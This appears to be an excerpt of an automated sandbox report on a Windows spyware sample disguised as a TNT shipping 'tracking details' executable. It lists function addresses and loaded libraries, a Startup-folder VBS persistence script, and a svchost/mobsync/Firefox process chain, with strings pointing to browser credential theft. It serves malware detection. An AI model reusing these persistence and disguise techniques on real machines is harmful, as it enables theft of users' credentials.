                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EED9750_2_00EED975
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECFCE00_2_00ECFCE0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE21C50_2_00EE21C5
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF62D20_2_00EF62D2
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F403DA0_2_00F403DA
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF242E0_2_00EF242E
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE25FA0_2_00EE25FA
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED66E10_2_00ED66E1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F1E6160_2_00F1E616
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF878F0_2_00EF878F
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F288890_2_00F28889
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F408570_2_00F40857
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF68440_2_00EF6844
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED88080_2_00ED8808
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EECB210_2_00EECB21
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF6DB60_2_00EF6DB6
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED6F9E0_2_00ED6F9E
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED30300_2_00ED3030
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEF1D90_2_00EEF1D9
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE31870_2_00EE3187
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC12870_2_00EC1287
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE14840_2_00EE1484
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED55200_2_00ED5520
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE76960_2_00EE7696
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED57600_2_00ED5760
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE19780_2_00EE1978
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF9AB50_2_00EF9AB5
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F47DDB0_2_00F47DDB
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEBDA60_2_00EEBDA6
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE1D900_2_00EE1D90
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED3FE00_2_00ED3FE0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECDF000_2_00ECDF00
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CE6A02_2_001CE6A0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001ED9752_2_001ED975
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CFCE02_2_001CFCE0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E21C52_2_001E21C5
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F62D22_2_001F62D2
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002403DA2_2_002403DA
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F242E2_2_001F242E
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E25FA2_2_001E25FA
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0021E6162_2_0021E616
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D66E12_2_001D66E1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F878F2_2_001F878F
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D88082_2_001D8808
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F68442_2_001F6844
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002408572_2_00240857
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002288892_2_00228889
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001ECB212_2_001ECB21
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F6DB62_2_001F6DB6
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D6F9E2_2_001D6F9E
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D30302_2_001D3030
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E31872_2_001E3187
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EF1D92_2_001EF1D9
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001C12872_2_001C1287
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E14842_2_001E1484
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D55202_2_001D5520
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E76962_2_001E7696
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D57602_2_001D5760
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E19782_2_001E1978
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F9AB52_2_001F9AB5
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E1D902_2_001E1D90
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EBDA62_2_001EBDA6
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00247DDB2_2_00247DDB
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CDF002_2_001CDF00
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D3FE02_2_001D3FE0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D36C02_2_015D36C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004185833_2_00418583
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004100333_2_00410033
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E0B33_2_0040E0B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040290C3_2_0040290C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004029103_2_00402910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011D03_2_004011D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004032403_2_00403240
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E28B3_2_0040E28B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042EC333_2_0042EC33
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401CE03_2_00401CE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004045E43_2_004045E4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040259B3_2_0040259B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402D9D3_2_00402D9D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402DA03_2_00402DA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004025A03_2_004025A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401E733_2_00401E73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE0A3_2_0040FE0A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE133_2_0040FE13
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004167C33_2_004167C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004167BF3_2_004167BF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C003E63_2_03C003E6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F03_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA3523_2_03BFA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC02C03_2_03BC02C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE02743_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF41A23_2_03BF41A2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C001AA3_2_03C001AA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF81CC3_2_03BF81CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA1183_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B301003_2_03B30100
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC81583_2_03BC8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD20003_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3C7C03_2_03B3C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B407703_2_03B40770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B647503_2_03B64750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5C6E03_2_03B5C6E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C005913_2_03C00591
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B405353_2_03B40535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEE4F63_2_03BEE4F6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE44203_2_03BE4420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF24463_2_03BF2446
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF6BD73_2_03BF6BD7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFAB403_2_03BFAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA803_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A03_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0A9A63_2_03C0A9A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B569623_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B268B83_2_03B268B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E8F03_2_03B6E8F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4A8403_2_03B4A840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B428403_2_03B42840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBEFA03_2_03BBEFA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4CFE03_2_03B4CFE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B32FC83_2_03B32FC8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B60F303_2_03B60F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE2F303_2_03BE2F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B82F283_2_03B82F28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB4F403_2_03BB4F40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52E903_2_03B52E90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFCE933_2_03BFCE93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFEEDB3_2_03BFEEDB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFEE263_2_03BFEE26
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40E593_2_03B40E59
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B58DBF3_2_03B58DBF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3ADE03_2_03B3ADE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDCD1F3_2_03BDCD1F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4AD003_2_03B4AD00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0CB53_2_03BE0CB5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30CF23_2_03B30CF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40C003_2_03B40C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B8739A3_2_03B8739A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF132D3_2_03BF132D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2D34C3_2_03B2D34C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B452A03_2_03B452A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE12ED3_2_03BE12ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5B2C03_2_03B5B2C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4B1B03_2_03B4B1B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0B16B3_2_03C0B16B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2F1723_2_03B2F172
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7516C3_2_03B7516C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF70E93_2_03BF70E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF0E03_2_03BFF0E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEF0CC3_2_03BEF0CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B470C03_2_03B470C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF7B03_2_03BFF7B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF16CC3_2_03BF16CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B856303_2_03B85630
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C095C33_2_03C095C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDD5B03_2_03BDD5B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF75713_2_03BF7571
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF43F3_2_03BFF43F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B314603_2_03B31460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5FB803_2_03B5FB80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB5BF03_2_03BB5BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7DBF93_2_03B7DBF9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFB763_2_03BFFB76
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDDAAC3_2_03BDDAAC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B85AA03_2_03B85AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE1AA33_2_03BE1AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEDAC63_2_03BEDAC6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB3A6C3_2_03BB3A6C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFA493_2_03BFFA49
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF7A463_2_03BF7A46
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD59103_2_03BD5910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B499503_2_03B49950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5B9503_2_03B5B950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B438E03_2_03B438E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAD8003_2_03BAD800
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFFB13_2_03BFFFB1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B41F923_2_03B41F92
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B03FD23_2_03B03FD2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B03FD53_2_03B03FD5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFF093_2_03BFFF09
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B49EB03_2_03B49EB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5FDC03_2_03B5FDC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF7D733_2_03BF7D73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF1D5A3_2_03BF1D5A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B43D403_2_03B43D40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFCF23_2_03BFFCF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB9C323_2_03BB9C32
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 00EC7DE1 appears 35 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 00EE8900 appears 42 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 00EE0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: String function: 001E8900 appears 42 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: String function: 001E0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: String function: 001C7DE1 appears 35 times
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/11@5/3
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2A06A GetLastError,FormatMessageW,0_2_00F2A06A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F181CB AdjustTokenPrivileges,CloseHandle,0_2_00F181CB
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F187E1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002181CB AdjustTokenPrivileges,CloseHandle,2_2_002181CB
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_002187E1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F2B3FB
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F3EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F3EE0D
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F383BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00F383BB
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EC4E89
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\hurtlingJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\aut73E7.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: mobsync.exe, 0000000A.00000003.2860650086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2858035680.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2858035680.0000000003348000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3366789394.0000000003398000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3366789394.000000000336A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TNT AWB TRACKING DETAILS.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile read: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" Jump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wininet.dllJump to behavior
